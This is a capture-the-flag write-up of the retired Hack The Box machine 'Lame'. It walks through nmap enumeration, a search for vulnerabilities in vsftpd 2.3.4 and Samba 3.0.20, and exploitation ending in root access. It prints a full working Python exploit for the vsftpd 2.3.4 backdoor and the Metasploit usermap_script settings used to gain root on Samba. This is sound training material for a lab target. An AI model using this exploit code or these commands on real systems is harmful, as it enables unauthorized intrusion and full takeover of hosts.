👎Lame
#network-enumeration-with-nmap #using-metasploit-framework #introduction-to-networking #getting-started #footprinting #linux-fundamentals
Lame is a beginner level machine, requiring only one exploit to obtain root access. It was the first machine published on Hack The Box and was often the first machine for new users prior to its retirement.
Loot
Preparation
As with all machines, first I will setup my local environment to ensure that I have somewhere to work from on my local machine and be ready to hack on the lame machine.
First I will create a working directory for this box and its nmap subdirectory, then make that the current working directory
mkdir -p ~/machines/htb/lame/nmap
cd ~/machines/htb/lameNext, I will ensure that I have started the machine on HTB, save the IP as a bash variable and connected to the HTB VPN.
export TARGET=10.10.10.3
sudo openvpn ./lab_Rizz0.ovpnEnumeration
Network Enumeration
Nmap - Port Scan
First thing that I will do is run a quick and dirty Nmap scan to find other threads to pull on while a full scan is conducted.
sudo nmap -sS -sC -sV -A ${TARGET} -oA ./nmap/lame_fast -F -vThe above command runs a TCP SYN scan, using the default scripts and enumerates versions (-sS -sC -sV). The scan is set to aggressive with the -A flag and is run against our bash variable that was set in the preparation (${TARGET}).
So that we can keep records of our findings we will output in all formats into the nmap subdirectory (-oA ./nmap/lame_fast) and finally set the scan as a fast scan only top 100 ports (-F).
Verbose output is selected with the -v flag to output information as it becomes available.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.21
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Sun Jun 9 00:37:25 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-06-08T10:51:25-04:00
|_clock-skew: mean: 2h00m19s, deviation: 2h49m43s, median: 18s
The interesting part of the Nmap scan output can be seen here.
While I review the output of the quick scan I will set a thorough Nmap scan into action. This scan will scan all ports (-p-) and output all formats to the Nmap subdirectory (-oA ./nmap/lame_full).
sudo nmap -sS -sC -sV -oA ./nmap/lame_full ${TARGET} -p- -T4The full scan provided no additional information.
Nmap - Vulnerability Scan
Now that we know what services are running on the machine, lets run an NMAP vulnerability script scan to see if we can identify any public exploits. Failing that we will manually search using searchsploit and exploitDB for exploits against each of the running services versions.
sudo nmap -script ftp-vuln*,smb-vuln* ${TARGET} -oA ./nmap/legacy-vuln
PORT STATE SERVICE
21/tcp open ftp
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 200.63 secondsThe automated vulnerability scan provided no extra information with respect to vulnerabilities on the lame host.
Note: There are no vulnerability scripts for ssh i.e. ssh-vuln* is not a category of script that can be searched.
To see all the scripts on your installation we can do a find and grep to search for all .nse files
sudo find / *.nse 2>/dev/null | grep vuln
/usr/share/nmap/scripts/http-vuln-cve2012-1823.nse
/usr/share/nmap/scripts/smb-vuln-regsvc-dos.nse
/usr/share/nmap/scripts/smb-vuln-ms10-054.nse
/usr/share/nmap/scripts/smb-vuln-ms06-025.nse
/usr/share/nmap/scripts/http-vuln-cve2010-0738.nse
/usr/share/nmap/scripts/ftp-vuln-cve2010-4221.nse
/usr/share/nmap/scripts/http-vuln-cve2009-3960.nse
/usr/share/nmap/scripts/samba-vuln-cve-2012-1182.nse
/usr/share/nmap/scripts/smtp-vuln-cve2010-4344.nse
/usr/share/nmap/scripts/rdp-vuln-ms12-020.nse
/usr/share/nmap/scripts/http-vuln-cve2011-3368.nse
/usr/share/nmap/scripts/smb-vuln-conficker.nse
/usr/share/nmap/scripts/http-vuln-cve2015-1635.nse
/usr/share/nmap/scripts/smtp-vuln-cve2011-1764.nse
/usr/share/nmap/scripts/http-vuln-cve2017-8917.nse
/usr/share/nmap/scripts/http-vuln-cve2017-5689.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2126.nse
/usr/share/nmap/scripts/smb-vuln-cve2009-3103.nse
/usr/share/nmap/scripts/http-vuln-wnr1000-creds.nse
/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
/usr/share/nmap/scripts/smtp-vuln-cve2011-1720.nse
/usr/share/nmap/scripts/smb2-vuln-uptime.nse
/usr/share/nmap/scripts/smb-vuln-ms08-067.nse
/usr/share/nmap/scripts/smb-vuln-ms07-029.nse
/usr/share/nmap/scripts/http-vuln-cve2013-0156.nse
/usr/share/nmap/scripts/http-iis-webdav-vuln.nse
/usr/share/nmap/scripts/http-vuln-cve2014-8877.nse
/usr/share/nmap/scripts/mysql-vuln-cve2012-2122.nse
/usr/share/nmap/scripts/http-vmware-path-vuln.nse
/usr/share/nmap/scripts/vulners.nse
/usr/share/nmap/scripts/http-vuln-cve2011-3192.nse
/usr/share/nmap/scripts/afp-path-vuln.nse
/usr/share/nmap/scripts/http-vuln-cve2013-7091.nse
/usr/share/nmap/scripts/rsa-vuln-roca.nse
/usr/share/nmap/scripts/smb-vuln-ms10-061.nse
/usr/share/nmap/scripts/smb-vuln-webexec.nse
/usr/share/nmap/scripts/http-huawei-hg5xx-vuln.nse
/usr/share/nmap/scripts/http-vuln-cve2017-1001000.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2127.nse
/usr/share/nmap/scripts/http-vuln-misfortune-cookie.nse
/usr/share/nmap/scripts/http-vuln-cve2010-2861.nse
/usr/share/nmap/scripts/smb-vuln-ms17-010.nse
/usr/share/nmap/scripts/http-vuln-cve2013-6786.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2128.nse
/usr/share/nmap/scripts/http-vuln-cve2014-2129.nse
/usr/share/nmap/scripts/smb-vuln-cve-2017-7494.nse
/usr/share/nmap/scripts/http-vuln-cve2014-3704.nse
/usr/share/nmap/scripts/rmi-vuln-classloader.nse
/usr/share/nmap/scripts/http-vuln-cve2006-3392.nse
/usr/share/nmap/scripts/http-vuln-cve2015-1427.nse
/usr/share/legion/scripts/nmap/vulners.nseProtocol Enumeration
FTP - Port 21
First we will manually search for vulnerabilities relating the version of vsftpd running on the host (vsftpd 2.3.4).
It was observed that there is a vulnerability resulting in backdoor command execution with a proof of concept in both Python and Ruby, we will come back and try these during the exploitation phase.
It was observed from the initial Nmap scan that FTP had Anonymous login enabled. It was observed that no files were available to read in the FTP directory from the Anonymous account and creation of files was disabled.
SSH - Port 22
At this stage in the penetration test we have no credentials or keys to enumerate the SSH service.
Looking for public exploits for the verision of OpenSSH running on the host (4.7p1) we find multiple potential exploits.
Samba - Ports 139, 445
No valid exploits were identified for smbd using searchsploit or exploitDB.
Samba searchsploit returned many vulnerabilities. Enumeration phase we know that we had a version of 3.0.20Debian.
We notice that there are two potential public exploits for our version of Samba
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rbManually enumerating the service we identified the following:
Running smbclient with no user specified we were able to list five smb share directories (print$, tmp, opt, IPC$ ADMIN$)
Manually connecting via smbclient we notice that we are able to connect as an unauthenticated user to the tmp directory. This allows us to view, and extract files from the directory and additionally upload our own files.
Exploitation
FTP
Enumeration phase testing identified that there were two proof of concept exploits available, one Python and one Ruby script. Because I am more familiar with Python we will first attempt to bring that script down, modify it if required and exploit the lame host.
searchsploit -m 49757.py
Reviewing the exploit code we can see that this is a vulnerability for vsftpd 2.3.4 and it has been tested on debian which is what we think the lame machine might be. We can see a few comments what could need to be edited when performing this exploit. However, the defaults look okay for what we need.
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact() python3 .49757.py 10.10.10.3This exploit seems to hang, so I tried downloading a different version from a github repository
git clone https://github.com/Lynk4/CVE-2011-2523.git
cd ./CVE-2011-2523
chmod +x exploit.pyThis updated version of the exploit ran hang, which lends me to believe that the lame host is not vulnerable to this cve.
SAMBA
Downloading and reviewing the expoits it was noted that one was a metasploit module, and the other was a proof of concept attmempting to put a string of text to the smb share, which didnt work. Within the metasploit ruby file it was noted that the script was named Username Map Script.
'Name' => 'Samba "username map script" Command Execution',Searching for the exploit within metasploit I found a potential corresponding module 'multi/samba/usermap_script'
Selecting this module and configuring then I configured the following options
set RHOSTS 10.10.10.3
set LHOST tun0
run
Exfiltration
After gaining root access to the machine we are dropped in the / directory. User and root flags can be found in the /root and /home/makis directories
Last updated